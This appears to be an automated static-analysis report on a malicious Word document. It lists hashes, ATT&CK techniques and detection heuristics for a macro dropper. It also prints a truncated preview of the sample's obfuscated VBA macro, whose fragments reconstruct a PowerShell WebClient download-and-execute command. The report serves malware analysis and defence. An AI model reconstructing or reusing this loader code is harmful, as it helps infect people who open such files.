Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1bdb47b82d2d2b36…

MALICIOUS

Office (OLE)

Size: 113.0 KB
Created: 2018-02-16 21:00:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: db4b78d780922f06a33bd4c818916f4e
SHA-1: 74520694bc4aa3530a3756921ad5199640b31a25
SHA-256: 1bdb47b82d2d2b36058c57d37695a5f0aebb4c37bac79058ff2946973765e122
Risk Score: 302

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing obfuscated VBA macros. Its AutoOpen macro (a common auto-execution technique) uses a Shell() call to download and execute a payload from the URL embedded in the document. This is dropper behaviour: the document exists to deliver a second-stage malicious component.

Heuristics (8)

  • ClamAV: Doc.Dropper.Agent-6450757-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6450757-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 4 related findings)
    The document contains VBA macro code.
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    The VBA code contains a Shell() call.
  • Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    The VBA project contains an AutoOpen macro.
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents and documents whose source extraction failed, where no visible source is available.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface; by itself it is not a downloader or parser-CVE attribution.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://college-deYw1+Yw1-bai9APm8+PmdmlCtSzimBXoTKLMWGfotYh (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 34130 bytes
SHA-256: fdd51b2ad0de278bf8fdc3a4f5ae3f1c4f48d1cb9fd2314d4ee95731d69ffe4d

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "nAGOEAqJriPKt"
Function hEoabtP()
On Error Resume Next
kAVRlWfsP = 4754426 / ChrB(9412911 + CBool(5502241)) / 1655382 * VNUHwXm * (XERPrO / fkCoqRm / 5349370 - CByte(8239960) / 4601568 - ksSQsGowiA)
LzAmlF = 3209176 / ChrB(3036443 + CBool(19512)) / 7636253 * ozCRiDiNGo * (oSzjldjRmtpHL / asfNOUC / 60868 - CByte(2856436) / 5564105 - ZZpbFfMcwRWB)
QnCEaOjwjE = 9830850 / ChrB(2855763 + CBool(7586221)) / 6130772 * AhwsqFHKwAr * (roDUwLDu / hOciNuDrjwboU / 9902199 - CByte(6394578) / 5766324 - iUhQGfUIGdThC)
PvUbAKqBV = (vXGjzvtbl) + ?HIUbhhuGKUsad("ppolASEktUh49),[sTriNG][char]39).REPLAce(([char]71+[char]86+[char]68),[sTriNG][char]36)| . ( $eNV:ComSPEc[4,15,25]-JOIN'')aHcZkUrbhLdq", 12, 111)
fznLdopu = 7842065 / ChrB(4252752 + CBool(8149342)) / 463329 * jMaajIWGQk * (ivrDcj / HjFIiwo / 5684015 - CByte(731468) / 5692812 - ozqAaAZQsjN)
KKvDAXaijiQ = 8441385 / ChrB(4333371 + CBool(8892248)) / 3703757 * nGZbuI * (iWXaid / GEsYcnSiVriM / 7606763 - CByte(6044366) / 8841782 - iOKnAXiBnfpI)
GBIsJZamOv = 5754319 / ChrB(595438 + CBool(4836527)) / 8205601 * GcJzwRfqJliz * (VcoioMXqlia / kwzKARSnYhCko / 7047124 - CByte(9386928) / 5935410 - rmwDFKNTvOMSwU)
LjnWIa = (NdLDTSBQiX) + ?HIUbhhuGKUsad("qXHjrARsWAqnPqZkcRwwVHFYw1+Yw1FdmU/T09AUPm8+Pm8+9AUX.Spl9AU+9AUit9AU+9AU(Pm8+Pm8T0X9AU+9AU?9AU+9AUT0X'+')9AU+9AU;I9AUpkppZ", 21, 97)
zHYiDH = 5787682 / ChrB(7447377 + CBool(5950201)) / 7314218 * qEDFUcMIBjWb * (PhTftvWnPCKzaC / zFVjizpFPK / 8078201 - CByte(6410573) / 5199982 - CNhnwiMc)
bqnPsoiT = 9665928 / ChrB(8681056 + CBool(6773880)) / 2911311 * aBsIuZmKwKnsza * (DUDOvWNpdJ / YNUGczTAPD / 4540262 - CByte(558741) / 9193052 - oGGCtu)
XaWhfqwYP = 9403434 / ChrB(799256 + CBool(7060478)) / 4884696 * pUTaNLOwQB * (pphnYwKYf / HGHQGmkO / 6393940 - CByte(3857228) / 5468532 - dniAaBrJEfFOQR)
njJHuo = (tDPsuuw) + ?HIUbhhuGKUsad("UdPsQoTnBnhpIkrhKPzXRwU'+'.9'+'AU+9AUWebCli9AU+9AUent;I9AU+9AU6NNPm8+Pm8SB = I9AU+9AU69'+'AU+9AUNnsaYw1+Yw1dasdWfAaAcXpzwa", 23, 89)
TBQaCzjM = 8854221 / ChrB(2230351 + CBool(8843760)) / 1708132 * XJjWNcBsz * (QisiaQCSFRoQ / SfUwYRWFbwzbkf / 4398934 - CByte(9564825) / 1108079 - TKRIzrA)
GcZjTbfcONN = 1307761 / ChrB(6303421 + CBool(8457782)) / 8732660 * rjGOOrtfcacj * (iuHqkfUzEVGc / jcwRli / 2398248 - CByte(7543294) / 930070 - UVRfEak)
AdiIaTN = 8620859 / ChrB(6576862 + CBool(6667392)) / 3695053 * wsQvMYon * (AlELQiL / zWBdjnUTzQZU / 5483692 - CByte(4582435) / 8905264 - PfEBpSnwRzTkM)
hXHdl = (KGZdkihz) + ?HIUbhhuGKUsad("tJqEwwR]Pm8+Pm8113+[cPm8+Pm8HARYw1+Yw1]56),[cHPm8+Pm8AR]'+'96 -REplaPm8+Pm8Yw1+Yw1CE ([cHA'+'RYw1+Yw1'+']73+[cHAR]54JhAEJWRfbdYsGtiTbROviWICpkkJ", 7, 110)
WHjNlvHIw = 8271383 / ChrB(2599239 + CBool(9234260)) / 7031076 * KAfjDMhTkG * (cjvZniZbQwF / EiizNqt / 9856247 - CByte(4654323) / 634562 - ODEcNbi)
KqKbFZHOFT = 7246660 / ChrB(2144981 + CBool(4081191)) / 6456776 * iYMpInUUfEn * (EUOTdqHHYS / ViFLAhMurXz / 9958126 - CByte(4783787) / 237592 - kLDii)
izkwvimDw = 2047048 / ChrB(3085843 + CBool(5793973)) / 4642127 * MPIUNaHQsqHDc * (nSJvDGUp / cFwDqkVF / 834984 - CByte(6433377) / 3625715 - REaizpjjKthj)
dVLYGG = (FvcNIPTlc) + ?HIUbhhuGKUsad("fzvtwivTsdSdKU.Net9AU+9ADTTpdDfItHcTk", 14, 11)
IcfimqBNN = 4258694 / ChrB(2708345 + CBool(6743283)) / 3292832 * QlJHiY * (TuUUldQ / RTYLNaYDKZqMZD / 4840499 - CByte(362149) / 3500846 - UAmNq)
DfXRQJrqwc = 9576499 / ChrB(8176999 + CBool(736384)) / 569359 * MBzZFOPCp * (DfsiwirLn / VSChJPID / 5570103 - CByte(5080159) / 4078420 - XBqIZR)
OGwEHdSzIT = 1283214 / ChrB(2209839 + CBool(7693527)) / 4308746 * uzoHEOI * (iQmBtz / QpGLZPCu / 1654540 - CByte(8375613) / 8345526 - IZFbczGHiUHE)
OIujPsdMOiU = (WRjWlCVJj) + ?HIUbhhuGKUsad("RoruPCqfbjaMmcAU+9AU6N'+'9AU+ZqNaBomiuafV", 15, 15)
XjvCwCbjA = 7821605 / ChrB(1881711 + CBool(412200)) / 7632957 * kviBWFvLBXru
... (truncated)